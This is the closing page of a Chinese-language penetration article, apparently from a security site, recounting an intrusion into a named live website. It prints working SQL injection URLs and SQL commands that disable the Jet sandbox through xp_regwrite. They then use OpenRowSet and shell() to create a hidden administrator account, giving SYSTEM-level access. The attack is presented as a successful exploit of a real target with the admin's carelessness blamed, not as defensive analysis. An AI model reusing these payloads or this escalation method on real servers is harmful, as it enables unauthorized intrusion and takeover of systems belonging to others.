|
c:\windows\system32\cmd.exe没有被删啊
那怎么办?
想要用SQL查询分析器连接吧, 但1433又不对外开放。外部不可以连接。
想把服务器上的1433端口转发到本地吧。又无ws.
网上查了查资料。
用沙盒模式提权来试下
再来构造个个SA的注入点。
这不难。继续构造。再次执行select name from sysobjects where type='U'查询myadmin这个数据库中的表名。<, /O:P>
好了。成功构造出来了。接着就是沙盒模式提权了。
http://haoteacher.200ym.cn/Manage/Include/sql.asp?id=1;EXEC%20master.dbo.xp_regwrite%20'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--
http://haoteacher.200ym.cn/Manage/Include/sql.asp?id=1;Select*From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user aloner$ aloner /add")');--
http://haoteacher.200ym.cn/Manage/Include/sql.asp?id=1;Select*From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators aloner$ /add")');--
返回正常。说明成功了。
或者用HDSI 执行下面这些SQL命令。
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user aloner aloner /add")');
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators aloner /add")');
至此,总算搞到system权限。顺便搞了几个程序。
总结一下:
这次入侵没什么技术性。
咱们渗透一个站点的时候,最重要的是不断的尝试+思路。
这次渗透主要还是大胆的实验和假设加上管理员的疏忽吧。演示站点的权限没有设置好。 上一页 1 2 3 4 | 
安全中国首页 > 文章中心 > 渗透技术